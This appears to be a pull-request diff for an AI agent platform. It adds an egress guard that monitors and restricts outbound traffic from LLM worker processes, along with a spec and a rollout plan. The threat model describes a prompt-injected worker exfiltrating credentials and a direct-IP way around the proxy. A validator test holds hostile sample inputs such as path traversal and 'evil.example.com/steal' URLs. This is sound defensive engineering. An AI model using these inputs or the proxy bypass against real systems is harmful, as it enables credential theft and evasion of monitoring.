-// startEgressAdapter builds the OBSERVE-ONLY egress adapter from config: a
-// monitoring guard that flags (never blocks) suspicious egress. PR4 slots
-// enforcement in behind the same Manager seam. The telemetry handle is accepted
-// so PR4 can hang enforcement counters off the same meter without changing the
-// signature.
-func startEgressAdapter(cfg langyagent.Config, _ *telemetry.Telemetry) *Manager {
-	ec := egress.DefaultConfig()
-	if hosts := parseHostList(cfg.EgressAllowedHosts); len(hosts) > 0 {
-		ec.AllowedHosts = hosts
-	}
+// startEgressAdapter builds the ADR-043 ENFORCING egress guard from config: a
+// per-worker outbound forward proxy that require-TLS / throttles / applies the
+// operator floor ∪ per-project allow-list / SNI-cross-checks every CONNECT,
+// monitor-first. The stock posture is monitor-only (no floor enforcement and no
+// per-project customer list) until an operator flips EgressEnforceFloor or a
+// customer sets an allow-list — see the Config defaults and ADR-043.
+func startEgressAdapter(cfg langyagent.Config, logger *zap.Logger) *Manager {
 	return &Manager{
-		egressAdapterConfig: ec,
-		egressGuard:         egress.NewMonitoringGuard(ec),
+		egressGuard: egress.NewEnforcingGuard(egress.EnforcingConfig{
+			Floor:         parseHostList(cfg.EgressFqdnFloor),
+			RequireTLS:    cfg.EgressRequireTLS,
+			EnforceFloor:  cfg.EgressEnforceFloor,
+			SNICrossCheck: cfg.EgressSNICrossCheck,
+			Logger:        logger,
+		}),
 	}
 }
 

--- a/services/langyagent/cmd/root.go
+++ b/services/langyagent/cmd/root.go
@@ -31,10 +31,11 @@ func Root(ctx context.Context, _ []string) error {
 		return err
 	}
 
-	// The egress adapter (ADR-044 part 5): observe-only monitoring that flags
-	// suspicious worker egress and NEVER blocks. PR4's enforcement swaps in
-	// behind the same Manager seam (startEgressAdapter / Manager.egressAdapterConfig).
-	mgr := startEgressAdapter(cfg, deps.Telemetry)
+	// The egress guard (ADR-043): per-worker outbound forward-proxy enforcement
+	// (require-TLS / throttle / floor ∪ allow-list / SNI cross-check), monitor-
+	// first. Stock posture is monitor-only until an operator/customer opts in.
+	// The pool consults it around each worker's lifecycle behind this seam.
+	mgr := startEgressAdapter(cfg, deps.Logger)
 
 	// The worker pool is the driven adapter. It wipes SESSIONS_ROOT before
 	// accepting traffic and binds worker subprocesses to the pool-lifetime

--- a/services/langyagent/config.go
+++ b/services/langyagent/config.go
@@ -72,8 +72,9 @@ type Config struct {
 
 	// Egress monitoring (ADR-044 part 5). Comma-separated hosts a worker may
 	// legitimately reach (control plane, gateway, git / gh / registry). Calls
-	// outside this set are FLAGGED (never blocked in PR3). Empty = flag every
-	// non-IP-literal host as unexpected; operators should set the real hosts.
+	// outside this set are FLAGGED (never blocked) by the observe-only
+	// MonitoringGuard/scorer. Empty = flag every non-IP-literal host as
+	// unexpected; operators should set the real hosts.
 	EgressAllowedHosts string `env:"LANGY_EGRESS_ALLOWED_HOSTS"`
 
 	// ShutdownHandoffDeadlineMS (ADR-048) is the wall-clock budget the manager
@@ -90,6 +91,28 @@ type Config struct {
 	// teardown, margin). Subtracted from the graceful window so the handoff
 	// deadline can never eat the drain budget out from under the kill.
 	ShutdownDrainBudgetMS int64 `env:"LANGY_SHUTDOWN_DRAIN_BUDGET_MS" validate:"gte=0"`
+
+	// Egress enforcement (ADR-043). These configure the per-worker egress
+	// forward proxy the manager spawns for each worker (see adapters/egress).
+	//
+	// EgressFqdnFloor is the operator-owned always-allowed set (github /
+	// gateway / control plane) — a floor, not a per-project policy. Additive to
+	// each project's customer allow-list (which rides the credentials envelope);
+	// never a ceiling by itself unless EgressEnforceFloor is on. Comma-separated
+	// (config.Hydrate has no []string support) and split in cmd.
+	EgressFqdnFloor string `env:"LANGY_EGRESS_FQDN_FLOOR"`
+	// EgressRequireTLS refuses cleartext forwards and non-:443 CONNECTs
+	// (rung 1a). Default ON — worker egress is HTTPS already, so this is the
+	// always-safe rung. (A malformed bool env fails the pod closed at startup.)
+	EgressRequireTLS bool `env:"LANGY_EGRESS_REQUIRE_TLS"`
+	// EgressEnforceFloor makes the floor a hard ceiling for projects that set
+	// no allow-list (rung 3 "always-on floor"). Default OFF so the stock
+	// posture stays monitor-only: an install that configures nothing upgrades
+	// into watching, not blocking.
+	EgressEnforceFloor bool `env:"LANGY_EGRESS_ENFORCE_FLOOR"`
+	// EgressSNICrossCheck peeks the TLS ClientHello SNI as an anti-fronting
+	// cross-check of the CONNECT authority. Default ON.
+	EgressSNICrossCheck bool `env:"LANGY_EGRESS_SNI_CROSSCHECK"`
 
 	// WorkspaceRoot is the shared-templates directory the pod entrypoint seeds
 	// with AGENTS.md and skills/ (see entrypoint.sh). setupWorkerHome reads
@@ -165,6 +188,13 @@ func defaultConfig() Config {
 		ShutdownHandoffDeadlineMS: defaultShutdownHandoffDeadlineMS,
 		ShutdownDrainBudgetMS:     defaultShutdownDrainBudgetMS,
 		reaperInterval:            defaultReaperInterval,
+		// ADR-043 rung 1a + SNI cross-check are the always-safe rungs; both
+		// default ON. Unset env leaves these defaults (Hydrate skips empty env),
+		// so an install that configures nothing still requires TLS and cross-
+		// checks SNI. EgressEnforceFloor defaults OFF (zero value) — the floor
+		// stays monitor-only until an operator flips it after reading monitoring.
+		EgressRequireTLS:    true,
+		EgressSNICrossCheck: true,
 		OTel: config.OTel{
 			SampleRatio: 1.0, // overridden to 0.1 for non-local in LoadConfig
 		},

--- a/services/langyagent/domain/credentials.go
+++ b/services/langyagent/domain/credentials.go
@@ -1,6 +1,11 @@
 package domain
 
-import "regexp"
+import (
+	"net/url"
+	"regexp"
+	"sort"
+	"strings"
+)
 
 // Credentials is the per-conversation auth bundle the control plane sends in
 // each /chat request. They are NEVER persisted — they live in the worker
@@ -20,6 +25,14 @@ type Credentials struct {
 	Model             string `json:"model,omitempty"`
 	GithubToken       string `json:"githubToken,omitempty"`
 	GithubLogin       string `json:"githubLogin,omitempty"`
+	// EgressAllowlist is the project's per-project Langy egress allow-list
+	// (ADR-043 rung 2), resolved by the control plane's
+	// LangyCredentialService.getEgressAllowlist and threaded through this
+	// envelope. The *presence* of the list is the mode: nil/empty ⇒ the egress
+	// adapter watches but blocks nothing; non-empty ⇒ the adapter restricts
+	// outbound to floor ∪ this list. Bound at worker spawn — a change recycles
+	// the worker (see SignatureOf) so a live worker never runs a stale policy.
+	EgressAllowlist []string `json:"egressAllowlist,omitempty"`
 }
 
 // Complete reports whether the mandatory credential fields are present. The
@@ -45,6 +58,13 @@ func (c Credentials) Complete() bool {
 type CredentialSignature struct {
 	Model         string
 	HasGithubAuth bool
+	// EgressAllowlist is a canonical fingerprint (sorted + newline-joined) of
+	// the project's egress allow-list (ADR-043). Folding it in means a policy
+	// change (the customer edits the list) recycles the worker on its next turn
+	// — the egress adapter is rebuilt with the new list, so a live worker is
+	// never left running under the old policy. A string (not the []string
+	// itself) keeps CredentialSignature comparable with ==.
+	EgressAllowlist string
 }
 
 // SignatureOf derives the comparable signature from a credentials payload.
@@ -52,9 +72,68 @@ type CredentialSignature struct {
 // capability, so a login change without a token must NOT force a recycle.
 func SignatureOf(creds Credentials) CredentialSignature {
 	return CredentialSignature{
-		Model:         creds.Model,
-		HasGithubAuth: creds.GithubToken != "",
+		Model:           creds.Model,
+		HasGithubAuth:   creds.GithubToken != "",
+		EgressAllowlist: canonicalEgressAllowlist(creds.EgressAllowlist),
 	}
+}
+
+// hostPatternPattern validates a normalised egress allow-list entry: an
+// optional single "*." wildcard prefix, then dot-separated [a-z0-9-] labels.
+// Mirrors the control plane's egressHostPatternSchema
+// (LangyCredentialService.ts) so the Go and TS validators agree on what a host
+// pattern is.
+var hostPatternPattern = regexp.MustCompile(`^(\*\.)?([a-z0-9-]+\.)*[a-z0-9-]+$`)
+
+// canonicalEgressAllowlist normalises an allow-list into an order-independent,
+// case-insensitive fingerprint so semantically-equal lists (reordered, mixed
+// case, trailing dots) do not spuriously recycle the worker, while any real
+// membership change does. Entries that are not clean host patterns are DROPPED
+// (defence in depth): the control plane already Zod-validates on write, so this
+// only fires on a drifted or hostile envelope — but the manager still refuses to
+// fold a URL, an authority with a port/userinfo, or a path-traversal like
+// "../../etc" into an allow rule. Kept in step with the Go matcher's
+// normalizeHost in adapters/egress/policy.go.
+func canonicalEgressAllowlist(list []string) string {
+	if len(list) == 0 {
+		return ""
+	}
+	norm := make([]string, 0, len(list))
+	for _, h := range list {
+		if n, ok := normalizeHostPattern(h); ok {
+			norm = append(norm, n)
+		}
+	}
+	if len(norm) == 0 {
+		return ""
+	}
+	sort.Strings(norm)
+	return strings.Join(norm, "\n")
+}
+
+// normalizeHostPattern lowercases + trims an allow-list entry and validates it
+// is a bare host (optionally "*."-wildcarded), returning ("", false) for
+// anything carrying a scheme, path, port, userinfo, query, or path-traversal.
+// It parses the value as the host of a scheme-relative URL — so "evil.com/steal",
+// "host:443", "user@host", and "../../etc" cannot round-trip to a bare host —
+// then charset-checks the result against hostPatternPattern.
+func normalizeHostPattern(raw string) (string, bool) {
+	h := strings.TrimSuffix(strings.ToLower(strings.TrimSpace(raw)), ".")
+	if h == "" {
+		return "", false
+	}
+	base := h
+	if rest, ok := strings.CutPrefix(h, "*."); ok {
+		base = rest
+	}
+	u, err := url.Parse("//" + base)
+	if err != nil || u.Hostname() != base || u.Path != "" || u.RawQuery != "" || u.Fragment != "" || u.User != nil {
+		return "", false
+	}
+	if !hostPatternPattern.MatchString(h) {
+		return "", false
+	}
+	return h, true
 }
 
 // conversationIDPattern restricts conversationId to a filesystem-safe charset

--- a/services/langyagent/domain/credentials_test.go
+++ b/services/langyagent/domain/credentials_test.go
@@ -59,6 +59,67 @@ func TestSignatureOf_DetectsModelAndGithubChanges(t *testing.T) {
 	}
 }
 
+// A per-project egress allow-list change (ADR-043) must recycle the worker so a
+// live worker never runs a stale egress policy; a semantically-equal list must
+// NOT, or a benign re-save would needlessly kill the conversation's worker.
+func TestSignatureOf_EgressAllowlistChangeRecyclesWorker(t *testing.T) {
+	a := SignatureOf(Credentials{EgressAllowlist: []string{"a.example.com"}})
+	b := SignatureOf(Credentials{EgressAllowlist: []string{"b.example.com"}})
+	if a == b {
+		t.Fatalf("changing the allow-list must change the signature (a=%+v b=%+v)", a, b)
+	}
+
+	// Reordering / case / trailing dot are the SAME policy — must NOT recycle.
+	x := SignatureOf(Credentials{EgressAllowlist: []string{"a.example.com", "B.example.com"}})
+	y := SignatureOf(Credentials{EgressAllowlist: []string{"b.example.com.", "a.example.com"}})
+	if x != y {
+		t.Fatalf("semantically-equal lists must share a signature (x=%+v y=%+v)", x, y)
+	}
+
+	// Setting a list where there was none is a change.
+	none := SignatureOf(Credentials{})
+	some := SignatureOf(Credentials{EgressAllowlist: []string{"a.example.com"}})
+	if none == some {
+		t.Fatalf("adding an allow-list must change the signature")
+	}
+}
+
+// A drifted/hostile envelope must not fold junk (a URL, an authority with a
+// port/path/userinfo, or a "../../" traversal) into the egress fingerprint — it
+// is dropped, so the signature is computed as if the junk were absent.
+func TestSignatureOf_EgressAllowlistDropsMalformedEntries(t *testing.T) {
+	none := SignatureOf(Credentials{})
+
+	// A list of only junk fingerprints identically to no list at all.
+	junkOnly := SignatureOf(Credentials{EgressAllowlist: []string{
+		"../../etc/passwd",
+		"https://evil.example.com/steal",
+		"evil.example.com/steal",
+		"evil.example.com:443",
+		"user@evil.example.com",
+		"has space.example",
+		"under_score.example",
+		"..",
+	}})
+	if junkOnly != none {
+		t.Fatalf("malformed-only allow-list must fingerprint as unset (got %+v want %+v)", junkOnly, none)
+	}
+
+	// A junk entry beside a valid one contributes nothing — same fingerprint as
+	// the valid one alone.
+	withJunk := SignatureOf(Credentials{EgressAllowlist: []string{"../../etc", "registry.npmjs.org"}})
+	clean := SignatureOf(Credentials{EgressAllowlist: []string{"registry.npmjs.org"}})
+	if withJunk != clean {
+		t.Fatalf("a dropped junk entry must not change the fingerprint (got %+v want %+v)", withJunk, clean)
+	}
+
+	// A legitimate wildcard pattern survives validation.
+	wild := SignatureOf(Credentials{EgressAllowlist: []string{"*.internal.acme.com"}})
+	if wild == none {
+		t.Fatalf("a valid wildcard pattern must be kept in the fingerprint")
+	}
+}
+
 func TestCredentials_Complete(t *testing.T) {
 	full := Credentials{
 		LangwatchAPIKey:   "k",

--- a/specs/langy/langy-egress-enforcement.feature
+++ b/specs/langy/langy-egress-enforcement.feature
@@ -1,0 +1,161 @@
+@unimplemented
+Feature: Langy worker egress enforcement — monitor first, enforce last
+  As the operator of the langyagent backend, and as a customer whose project
+  Langy acts on
+  I want outbound traffic from a prompt-injectable Langy worker to be watched by
+  default and restricted only to the destinations the customer trusts
+  So that a compromised worker cannot exfiltrate the live LangWatch key, gateway
+     key, GitHub token, or the customer's trace/PII data to an attacker host,
+     while a customer who has configured nothing is never silently broken
+
+  # ---------------------------------------------------------------------------
+  # Background: the threat and the layering
+  #
+  # Each worker holds a different user's live credentials and runs LLM-generated
+  # shell, so outbound exfiltration is the top risk. The pod runs under gVisor,
+  # where kernel netfilter is unavailable (ADR-033) — so iptables redirect / NAT
+  # / OWNER-match cannot gate egress. NetworkPolicy bounds L3/L4 (deny-by-default
+  # with RFC-1918 + the cloud metadata service carved out) but cannot express
+  # FQDN egress without a CNI like Cilium.
+  #
+  # PR1 adds a per-worker egress adapter (a forward proxy the worker's tools
+  # egress through, mirroring the inbound authProxy). PR3 adds MONITORING on that
+  # adapter: every outbound flow is observed, attributed to a worker/conversation,
+  # and flagged — but nothing is blocked. This feature (PR4) adds the ENFORCEMENT
+  # rungs on top, in the order monitoring earned:
+  #   0. always-on monitoring (from PR3) — every rung below also flags
+  #   1. require TLS + per-destination throttle
+  #   2. customer allow-list: unset -> monitor only; set -> restrict to it
+  #   3. always-on FQDN floor (github / gateway / control-plane), once proven
+  #
+  # The customer allow-list is a per-project setting resolved by the control
+  # plane and threaded into the per-request credentials envelope; the adapter is
+  # constructed with that worker's list at spawn.
+  # ---------------------------------------------------------------------------
+
+  # ===========================================================================
+  # Rung 0 / Rung 2 default — no allow-list means monitor, not block
+  # ===========================================================================
+
+  Scenario: With no allow-list, outbound traffic is monitored but allowed
+    Given a project has not configured a Langy egress allow-list
+    And a worker is running for a conversation in that project
+    When the worker makes an outbound TLS connection to any external host
+    Then the connection is allowed
+    And the destination is recorded and attributed to the worker's conversation
+    And nothing is blocked on allow-list grounds
+
+  Scenario: With no allow-list, a suspicious destination is flagged without being blocked
+    Given a project has not configured a Langy egress allow-list
+    And a worker is running for a conversation in that project
+    When the worker connects to a destination never seen for that project before
+    Then the connection is allowed
+    And the destination is flagged as anomalous for an operator to review
+
+  # ===========================================================================
+  # Rung 2 — allow-list set means restrict to it
+  # ===========================================================================
+
+  Scenario: With an allow-list set, a listed host is allowed
+    Given a project's Langy egress allow-list contains "registry.npmjs.org"
+    And a worker is running for a conversation in that project
+    When the worker makes an outbound TLS connection to "registry.npmjs.org"
+    Then the connection is allowed
+    And the destination is recorded and attributed to the worker's conversation
+
+  Scenario: With an allow-list set, a non-listed host is blocked and flagged
+    Given a project's Langy egress allow-list contains "registry.npmjs.org"
+    And a worker is running for a conversation in that project
+    When the worker attempts an outbound TLS connection to "attacker.example.com"
+    Then the connection is denied at the egress adapter
+    And the destination never receives any bytes
+    And the denied attempt is flagged and attributed to the worker's conversation
+
+  Scenario: Changing the allow-list does not leave a live worker on the old policy
+    Given a worker is running under a project with allow-list "a.example.com"
+    When the project's allow-list is changed to "b.example.com"
+    And the same conversation takes its next turn
+    Then the worker is recycled so it runs under the new allow-list
+    And a request to "b.example.com" is allowed
+    And a request to "a.example.com" is denied
+
+  # ===========================================================================
+  # Rung 1 — require TLS
+  # ===========================================================================
+
+  Scenario: Cleartext egress to an external host is refused
+    Given a worker is running for a conversation
+    When the worker attempts a plaintext HTTP request to an external host
+    Then the request is refused at the egress adapter
+    And the worker cannot send the bytes over cleartext to a public destination
+
+  Scenario: TLS egress to an allowed host still succeeds
+    Given a worker is running for a conversation
+    And the destination host is permitted for that worker
+    When the worker opens a TLS tunnel to that host
+    Then the tunnel is established and the request succeeds
+
+  # ===========================================================================
+  # Rung 1 — per-destination throttle
+  # ===========================================================================
+
+  Scenario: A high-volume flow to a single destination is throttled and flagged
+    Given a worker is running for a conversation
+    When the worker streams an unusually large volume to a single destination
+    Then the flow to that destination is throttled
+    And the flow is flagged for an operator to review
+    And other destinations for that worker are not slowed
+
+  Scenario: A burst of new connections to a rare host is throttled
+    Given a worker is running for a conversation
+    When the worker opens many new connections to a rarely-seen host in a short window
+    Then the new-connection rate to that host is throttled
+    And the burst is flagged and attributed to the worker's conversation
+
+  # ===========================================================================
+  # Rung 3 — always-on FQDN floor
+  # ===========================================================================
+
+  Scenario: Structural destinations stay reachable regardless of allow-list
+    Given the operator FQDN floor includes GitHub, the AI gateway, and the control plane
+    And a project has not configured a Langy egress allow-list
+    When a worker performs its GitHub, gateway, or control-plane traffic
+    Then those connections are allowed by the floor
+    And the worker's legitimate PR / model / API work is unaffected
+
+  Scenario: The floor composes with, and is not widened by, an empty customer list
+    Given a project has not configured a Langy egress allow-list
+    When a worker connects to a host outside the operator FQDN floor
+    Then the floor does not deny it
+    But it remains monitor-only rather than allow-listed
+
+  # ===========================================================================
+  # Rung 3 limitation — cooperative L7, honestly bounded
+  # ===========================================================================
+
+  Scenario: A direct-IP bypass of the adapter is still observed
+    Given a worker is running under an enforced allow-list
+    When the worker ignores its proxy and connects directly to an external IP on 443
+    Then the adapter cannot block that cooperative bypass in the stock pod
+    But the direct connection is still observed at the flow level and flagged
+    And an operator who needs it blocked can enable the Cilium FQDN policy or the per-worker netns floor
+
+  # ===========================================================================
+  # Rung 4 — the legacy path is gone
+  # ===========================================================================
+
+  Scenario: The worker has no unproxied egress path once enforcement lands
+    Given the egress adapter is the sole egress path for workers
+    When a worker's tools make outbound requests
+    Then all egress is observed and enforced at the adapter
+    And the previous direct worker-to-internet path is no longer available
+
+  # ===========================================================================
+  # Safe-by-default posture
+  # ===========================================================================
+
+  Scenario: An install that configures nothing upgrades into watching, not blocking
+    Given an existing install with no per-project allow-lists and the FQDN floor off
+    When workers make their normal outbound requests after this change ships
+    Then no new outbound request is blocked by default
+    And every outbound request is monitored and attributable

--- a/specs/langy/langy-pr4-plan.md
+++ b/specs/langy/langy-pr4-plan.md
@@ -1,0 +1,206 @@
+# Plan: Langy egress enforcement (PR4 of 4)
+
+- **ADR:** `dev/docs/adr/043-langy-egress-enforcement.md`
+- **Spec:** `specs/langy/langy-egress-enforcement.feature`
+- **Branch (design):** `design/langy-pr4` (this doc + ADR + spec; docs-only)
+- **Implementation branch (later):** `feat/langy-egress-enforcement`
+- **BLOCKED ON PR3** — the egress instrumentation seam (PR1) and the monitor-only
+  telemetry (PR3) must be merged and have observed real traffic first. Every rung
+  below is defined relative to what PR3's monitoring proved legitimate. Do not
+  implement until PR3 lands.
+
+## Goal
+
+Turn the always-on egress *monitoring* PR3 provides into an enforcement ladder,
+climbed in the order monitoring earned, with the default posture staying
+monitor-only:
+
+1. **Require TLS + per-destination throttle** at the L7 adapter.
+2. **Customer allow-list** — per-project, opt-in. Unset ⇒ monitor only; set ⇒
+   restrict to it. This is the crux: enforcement is the customer's policy.
+3. **FQDN floor** — always-on for the destinations Langy structurally needs
+   (GitHub / gateway / control plane), once monitoring proved that set.
+4. **Drop the legacy synchronous egress path** superseded by the seam.
+
+## Target flow (config → envelope → adapter)
+
+```
+ Project settings                Chat time (langy.ts /chat)          Worker pod (Go adapter)
+ ────────────────                ──────────────────────────          ───────────────────────
+ customer sets                   getOrProvision()                    spawnWorker()
+ egress allow-list  ──────┐       + getEgressAllowlist()  ───┐        + startEgressAdapter(
+ (per-project, nullable)  │             │                    │            allowlist, floor)
+                          │             ▼                    │              │
+                          │      credentials.egressAllowlist │              ▼
+                          │             │                    └──► worker env: HTTPS_PROXY
+                          └─────────────┴──► /chat body ──────────► Credentials{egressAllowlist}
+                                                                            │
+   null/empty  = monitor only  ◄── presence of list IS the mode ──►  non-empty = enforce
+                                                                            │
+                                                                    per-CONNECT decision:
+                                                                    require-TLS → throttle →
+                                                                    allow-list ∪ floor → flag
+```
+
+## What already exists (reuse, don't reinvent)
+
+| Thing | Where | Reuse for |
+|---|---|---|
+| Per-worker proxy pattern (inbound) | `services/langyagent/adapters/workerpool/authproxy.go` (`startAuthProxy`, per-worker listener + secret, `shutdown`) | The egress adapter is the **outbound** twin: per-worker forward proxy, constructed with that worker's policy, shut down with the worker. Mirror it — don't invent a new topology. |
+| Credentials envelope | `services/langyagent/adapters/workerpool/worker.go` `Credentials` struct + `buildWorkerEnv`; TS `LangyCredentials` | Add `egressAllowlist` to both; inject `HTTPS_PROXY` (loopback adapter) into the worker env in `buildWorkerEnv`. |
+| Capability-change worker recycle | `worker.go` `CredentialSignature` / `signatureOf` | Add `egressAllowlist` to the signature so a policy change recycles the worker (spec: "does not leave a live worker on the old policy"). |
+| Model allow-list precedent | `LangyCredentialService.getModelsAllowed()` + defense-in-depth check in `langy.ts:389-409` | Copy the shape for `getEgressAllowlist()` (`string[] | null`, null = watch) and the envelope threading. |
+| Envelope construction | `langwatch/src/server/routes/langy.ts:367,482-494` | Add `egressAllowlist` to the `/chat` body next to `modelOverride`. |
+| NetworkPolicy egress + carve-outs | `charts/langyagent/templates/networkpolicy.yaml`, `values.yaml` `networkPolicy.allowExternalHttps` | Narrow the `0.0.0.0/0:443` rule to the adapter's upstream (rung 4); add the FQDN-floor values + optional Cilium template. |
+| gVisor / netfilter constraint + netns fallback | ADR-033 | FQDN enforcement lives at L7 (no netfilter); Fix B netns is the non-Cilium bypass-proof floor. |
+
+## Config schema
+
+**Per-project setting (control plane).** Nullable; unset = monitor-only.
+
+- `Project.langyEgressAllowlist Json?` — an array of host patterns
+  (`["registry.npmjs.org", "*.internal.acme.com"]`), validated through a Zod
+  schema at read time (mirror `parseVirtualKeyConfig`). Chosen over a VK-config
+  field because the *adapter*, not the gateway, enforces it — the VK is a
+  category mismatch (ADR §"Where the allow-list config lives"). A dedicated
+  `LangyEgressPolicy` row keyed by `projectId` is the alternative if we want an
+  audit trail on policy changes; the column is proposed for parity with the
+  existing per-project Langy fields.
+- Resolver: `LangyCredentialService.getEgressAllowlist({ projectId }): Promise<string[] | null>`.
+  `null`/empty ⇒ monitor-only; non-empty ⇒ enforced set.
+
+**Envelope (both sides).**
+
+- TS `LangyCredentials` gains `egressAllowlist?: string[]`.
+- Go `Credentials` gains `EgressAllowlist []string \`json:"egressAllowlist,omitempty"\``.
+
+**Operator floor (chart, not per-project).**
+
+- `charts/langyagent/values.yaml`: `networkPolicy.egressFqdnFloor: [github.com,
+  api.github.com, codeload.github.com, <gateway>, <control-plane>]` — the
+  always-on rung 3 set, documented as "operator floor, not customer policy."
+- Effective allow set at the adapter = `floor ∪ customerAllowlist`.
+
+## Enforcement points (file by file)
+
+Control plane (TypeScript):
+
+- [ ] `prisma/schema.prisma` — add `langyEgressAllowlist Json?` to `Project`
+      (+ migration). Include `projectId` in every read (multitenancy).
+- [ ] `langwatch/src/server/services/langy/LangyCredentialService.ts` — add
+      `getEgressAllowlist({ projectId })`, Zod-validated, `string[] | null`,
+      `null` = watch. Mirror `getModelsAllowed` (tenancy in the WHERE, parse
+      through Zod so a drifted value fails closed rather than disabling
+      enforcement).
+- [ ] `langwatch/src/server/routes/langy.ts` — resolve the allow-list and add
+      `egressAllowlist` to the `credentials` object built at ~L367; it then
+      rides the existing `/chat` body at L482-494. No new channel.
+- [ ] Settings UI (optional, can trail the enforcement): a per-project "Langy
+      egress allow-list" editor. Follow `dev/docs/best_practices/` (scope
+      selector, drawers). Copy per `copywriting.md`: say what it does for the
+      customer ("hosts Langy may reach for this project — leave empty to watch
+      without blocking"), not how it's built. **Not required for PR4 to
+      enforce** — the resolver + envelope are the enforcement path; UI is how a
+      customer sets the value (a tRPC mutation writing the column is the minimum).
+
+Agent pod (Go, `services/langyagent/`):
+
+- [ ] `egressadapter.go` (new) — per-worker forward proxy mirroring
+      `authproxy.go`: `startEgressAdapter({ allowlist, floor, throttle }) ->
+      *egressAdapter` with `shutdown()`. Per-`CONNECT` decision pipeline:
+      1. **require-TLS** — accept only `CONNECT host:443` tunnels; refuse
+         cleartext forward to external hosts.
+      2. **throttle** — per-destination-host, per-worker new-connection-rate +
+         byte-rate limiter; slow + tar-pit, never a hard cliff.
+      3. **allow-list ∪ floor** — read FQDN from the CONNECT authority (SNI as
+         cross-check); if the effective set is non-empty and the host is not in
+         it, deny; if the customer set is empty, allow (monitor-only) but the
+         floor still applies.
+      4. **flag** — every decision (allow / throttle / deny) emits PR3's
+         telemetry, attributed to the conversation. Enforcement = a monitored
+         event with a verb.
+- [ ] `worker.go` — `Credentials` gains `EgressAllowlist`; `signatureOf` folds
+      it in (policy change → recycle); `buildWorkerEnv` injects
+      `HTTPS_PROXY=http://127.0.0.1:<egressPort>` (and `HTTP_PROXY`, `NO_PROXY`
+      for loopback + in-cluster) so worker tools egress through the adapter.
+- [ ] `manager.go` — allocate the per-worker egress port, start/stop the adapter
+      alongside the existing authProxy in the worker lifecycle.
+- [ ] `handler.go` — thread `req.Credentials.EgressAllowlist` through to
+      `mgr.Get` (already carries `creds`); no schema surprise, it's on
+      `Credentials`.
+- [ ] `egressadapter_test.go` (new) — the security-critical Go tests: cleartext
+      refused; non-listed host denied (bytes never sent); listed host allowed;
+      empty list = allow + flag; floor always allowed; throttle slows one
+      destination without slowing others; policy-change recycles the worker.
+      These are the executable acceptance bar (not string assertions).
+
+Chart:
+
+- [ ] `charts/langyagent/values.yaml` + `templates/` — add
+      `networkPolicy.egressFqdnFloor` (adapter config) and a documented "floor,
+      not policy" note. **Rung 4:** narrow `allowExternalHttps`'s
+      `0.0.0.0/0:443` to the adapter's upstream once the adapter is the sole
+      egress path. Optional `templates/ciliumnetworkpolicy.yaml` (guarded by a
+      values flag) with `toFQDNs` for bypass-proof installs; reference ADR-033
+      Fix B (per-worker netns) as the non-Cilium bypass-proof fallback in the
+      values comment.
+
+Docs:
+
+- [ ] `docs/langy-github-app.md §4` — update the existing L3/L4-FQDN note to
+      point at the egress adapter as the primary FQDN enforcement point and
+      ADR-043 as the design; keep the Cilium option, add the netns fallback.
+
+## Safe rollout order (monitor → throttle → block)
+
+Each step is independently shippable and observable before the next. **The
+default posture never blocks until a customer or operator opts in.**
+
+1. **PR3 (dependency), monitor-only.** Adapter observes + attributes + flags.
+   Nothing denied. Bake in prod; read the traffic.
+2. **Rung 1a — require TLS.** Turn on cleartext refusal. Low false-positive risk
+   (worker egress is HTTPS already); watch the flag stream for any legitimate
+   plaintext flow first.
+3. **Rung 1b — throttle.** Enable per-destination throttle. Soft by design;
+   tune thresholds against the monitored byte/connection distributions from
+   step 1. Still no hard denies.
+4. **Rung 2 — customer allow-list.** Ship the resolver + envelope + adapter
+   matcher. Default stays monitor-only (unset list). Customers opt in per
+   project after reading their own monitored traffic. First hard-deny rung, but
+   customer-scoped.
+5. **Rung 3 — FQDN floor.** Only after monitoring across installs confirms the
+   structural set (GitHub / gateway / control plane) is complete, make the floor
+   always-on. Operator flag; off by default until proven per install.
+6. **Rung 4 — drop the legacy path.** Once rungs 1-3 are observed working,
+   remove unproxied worker egress and narrow the `0.0.0.0/0:443` NetworkPolicy
+   rule to the adapter upstream. Last, because it's the irreversible one.
+
+## Acceptance
+
+The bar is `specs/langy/langy-egress-enforcement.feature`, bound to executable
+Go tests in `egressadapter_test.go` (deny/allow/throttle/require-TLS/floor/
+recycle) plus a control-plane integration test that `getEgressAllowlist` returns
+`null` = watch and a set list = enforce, and that the envelope carries it.
+Scenarios stay `@unimplemented` until bound to those tests. The honest-limit
+scenario (direct-IP bypass observed-but-not-blocked in the stock pod) is asserted
+against the monitoring layer, and the Cilium / netns floors are the documented
+bypass-proof upgrades.
+
+## Open questions
+
+1. **Host-pattern syntax for the allow-list.** Exact hosts only, or wildcards
+   (`*.internal.acme.com`)? Wildcards are more usable but widen the matcher's
+   attack surface. Proposal: start exact-host + a single leading-label wildcard;
+   validate through Zod.
+2. **Adapter config home for the column vs a `LangyEgressPolicy` row.** Column is
+   simplest and matches existing per-project Langy fields; a row gives a change
+   audit trail. Proposal: column now, revisit if customers ask for policy
+   history.
+3. **Throttle thresholds.** Must be derived from PR3's observed distributions,
+   not guessed — so the numbers are a step-3 tuning task, not a design constant.
+4. **Does the customer allow-list also gate the FQDN floor?** No — floor is
+   operator-owned and always-on once enabled; the customer list is additive
+   (`floor ∪ list`). Confirmed in ADR §Rung 3.
+5. **Bypass-proofing default.** Do we ship Cilium `toFQDNs` on by default where
+   Cilium is present, or leave it opt-in? Proposal: opt-in template; the stock
+   default is cooperative-adapter + monitored-bypass, upgradable per install.


### PR DESCRIPTION
## PR4 of 4 — Langy egress enforcement (ADR-043)

Implements the egress **enforcement** ladder on top of PR3's egress
**monitoring** seam. Design: `dev/docs/adr/043-langy-egress-enforcement.md`,
`specs/langy/langy-egress-enforcement.feature`, `specs/langy/langy-pr4-plan.md`
(all included here). Default posture stays **monitor-only** — an install that
configures nothing upgrades into *watching*, not *blocking*.

### ⚠️ Base branch — I had to fall back off PR3
PR3's branch (`feat/langy-worker-streaming`) and the PR1+PR2 integration branch
(`feat/langy-integration`) **do not exist on the remote yet**, so per the plan's
fallback I branched off **`origin/feat/langy-event-sourcing`** and this PR's base
is `feat/langy-event-sourcing`. **This MUST be rebased onto PR3 before merge.**

Because PR3's egress-monitoring seam is not on this base, I implemented against
the interface the PR4 plan defines and **stubbed the PR3 coupling**: the rung-0
`egressMonitor` interface (`egressmonitor.go`) ships with a zap-logging
implementation (`logEgressMonitor`) that flags every decision. When PR3 lands,
its attributed-telemetry monitor is injected at `startEgressAdapter` /
`Manager.egressAdapterConfig` in place of the logging default — one seam, clearly
marked with `NOTE (PR4-on-fallback-base)`.

### What's implemented
